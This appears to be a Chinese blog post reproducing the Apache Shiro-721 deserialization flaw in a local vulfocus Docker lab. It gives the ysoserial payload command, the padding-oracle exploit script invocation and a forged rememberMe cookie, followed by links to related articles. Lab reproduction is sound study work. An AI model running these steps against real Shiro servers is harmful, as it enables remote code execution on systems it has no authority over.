Apache Shiro-721反序列化漏洞复现(vulhub)

已于 2023-03-29 22:48:33 修改
阅读量338 收藏 3
点赞数 1
文章标签: java 安全 开发语言
于 2023-03-27 22:39:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52685785/article/details/129805905
版权

下载并启动环境

docker pull vulfocus/shiro-721

docker run -d -p 8080:8080 vulfocus/shiro-721

 登录网页

输入用户名和密码并勾选记住密码

当密码输错后,响应包会出现rememberMe=deleteMe; 字样

通过抓包(正确的用户名与密码)并放包得到rememberMe的值,将其放入重发器。

rememberMe=p+Ot1otMTAU/lnfy43AOKys00pW+Y7anp43z7wYl61eByEHpC6ThqNVUYQcGoX58uQrAkHBKsxnuH022zJ01MUzISaDy90QwSKDCyDBWxiONgNejRfZErrjRh34U1WqOf0NMP3wCdmokZgfZnEHPf+0PltMrLsOos7cMhRjSX27OaZj7fygKxMVrGST4PRYjbvXKdQAhYIa7CoyQmBGuhmsM0HkTxGnaAV0dDR2bTkWLJjwG1lvzkQGChQQ/IOxUf9n5twVNQZF2o2Bs1lhqzqS9Sx63PLXLB+xFzRrdvJtg7d1CYLA76uOeYmjZNUFhw0/osNJXdKWfjxrBKfJc1FmGxfxvcMUThRS6b8xNEOU/K1RpLmfmqcqKJfff0bu8roiJVuIJ6gFG9nkuz7gTrihYfn1UMw90he/gpxB6Bl9Feb0CvyH7w4AOL5AmIsL7LwRCKMa37caj4MoSg+YEAOeydo1upbPDFib/1pUOxXF32gnwa2eE3w+yJGnRy/wh

使用Java反序列化工具 ysoserial 生成 Payload: 这里可以生成在目标靶机根目录中创建test的payload(java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class)

通过 Padding Oracle Attack生成 Evil Rememberme cookie:

(cp payload.class  shiro_rce_exp-master

cd shiro_rce_exp-master

python shiro_exp.py http://your-ip:8080/account/  之前获取的RememberMe值   payload.class)

此处需要改为python2运行指令

 它会不停地进行爆破,直到爆破出结果

rememberMe cookies:

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

使用Evil Rememberme cookie 认证进行反序列化攻击:复制该cookie,然后重放一下数据,即可成功执行命令,将之前获取的rememberMe更改为刚才爆破出的结果,并放行。

可是因为内存不足无法进入容器

~Auspicious~
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全---漏洞复现shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程)
m0_67844671的博客
09-25 2355
shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程);详细还原了漏洞漏洞利用方式;Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Shiro721漏洞复现(自动化工具使用&&详细教程)
m0_52701599的博客
03-26 1513
Shiro721漏洞复现(自动化工具使用&&详细教程)
shiro-721反序列化漏洞复现
weixin_63960760的博客
08-22 857
密码分组链接模式(Cipher Block Chaining,CBC),其中“分组"是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。"链接”是指密文分组像链条一样相互连接在一起。
Shiro 550与721漏洞的不同
热门推荐
一醉一休的博客
03-08 1万+
利用难度区别、版本区别
shiro-721漏洞复现
qq_53409748的博客
03-28 609
Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
项目介绍基于Apache Shiro反序列化漏洞进行利用链的探测,附内存马。利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。探测到...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
Apache shiro1.2.4反序列化漏洞介绍 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次...
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
12-23
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具 Shiro_exploit Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,...
Shiro-721漏洞复现
weixin_51641247的博客
03-26 631
Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。影响版本:Apache Shiro
复现shiro721漏洞
AmeV_ll的博客
03-26 301
Apache Shiro框架提供了(RememberMe),用户登录成功后会生成经过加密并编码的cookie,cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理 服务端在接收cookie时: 1、检索RememberMe Cookie的值 2、Base64解码 3、AES解密(加密密钥硬编码) 4、进行反序列化操作(未过滤处理) 5、攻击者可以使用Shiro的默认密钥构造恶意序列化对象进行编码来伪造
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5733
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
使用AWVS进行漏洞扫描实验,保姆教程
大河之犬的博客
11-18 2075
对于相当数量的网安学生,他们其实最终还是去做了计科的工作,也就是开发岗,这是因为网安都岗位相对较少而且要求较高,要面对那些从小开始搞的天才少年们,因此想要从事本专业工作的同学联系读研深造。如果不想进大厂,也可国企,体制,比较有特色的就是国安局,我觉得还是很香的,这种首先很吃学校和学历还有学长之间的内推,所以要尽力提升学校档次。总的来说,网安目前是一个需求量不大,要求高,待遇还可以的专业。kali(或者其他的linux系统)预装的源来自于国外的服务器,我们可以把apt的源设置为国内的镜像源,加快速度。
漏洞复现-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1701
【EmpireCms-文件上传】帝国建站
vulfocus漏洞复现-初级】solr 代码执行 (CVE-2019-12409)
ll_515的博客
01-20 1663
Apache Solr受影响的版本8.1.1和8.2.0在solr.in.sh配置文件中默认开启了ENABLE_REMOTE_JMX_OPTS配置项,即允许远程加载JMX,导致可远程代码执行。
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
一剑开天门!的博客
03-02 5226
vulfocus漏洞复现】Spring boot (CVE-2021_21234)
Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557
weixin_45632448的博客
04-02 3793
vps:腾讯云 centos8 本地:windows11 靶场环境:http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make 编译之后继续执行命令 git clone https://github.com/Ridter/redis-rce.git cd redis-rce/
使用vulfocus靶场复现Tomcat 任意写入文件漏洞(CVE-2017-12615)
R0ot
10-15 1014
访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境。修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了。运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行。复制about:preferences到火狐浏览器中打开,配置代理。Tomcat 任意写入文件漏洞(CVE-2017-12615)可以看到版本已经为1.8.0了,我们再次运行冰蝎子。搜索CVE-2017-12615。
shiro721漏洞检查工具
最新发布
12-28
shiro721漏洞检查工具是一款专门用于检测网络安全漏洞的软件。它可以帮助用户发现网络系统中存在的各种漏洞安全隐患,从而提前预防可能的安全风险。该工具具有扫描快速、全面性强的特点,可以有效地发现系统中的各种潜在漏洞,包括但不限于密码弱口令、未授权访问、系统配置错误等。 shiro721漏洞检查工具通过对网络系统进行扫描和分析,能够主动地发现并报告系统中的潜在安全问题,为用户提供及时的漏洞修复建议。同时,它还可以帮助用户对系统进行安全性评估和风险分析,为用户提供全面的安全防护方案。 该工具操作简单,界面友好,用户无需专业安全知识也能轻松上手。它还支持定时自动扫描功能,可以帮助用户定期对系统进行漏洞检查,保障系统安全。 总之,shiro721漏洞检查工具是一款功能强大、操作简便、安全可靠的网络安全工具,可以帮助用户提高网络系统的安全性,预防潜在的安全风险,是网络安全管理的得力助手。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值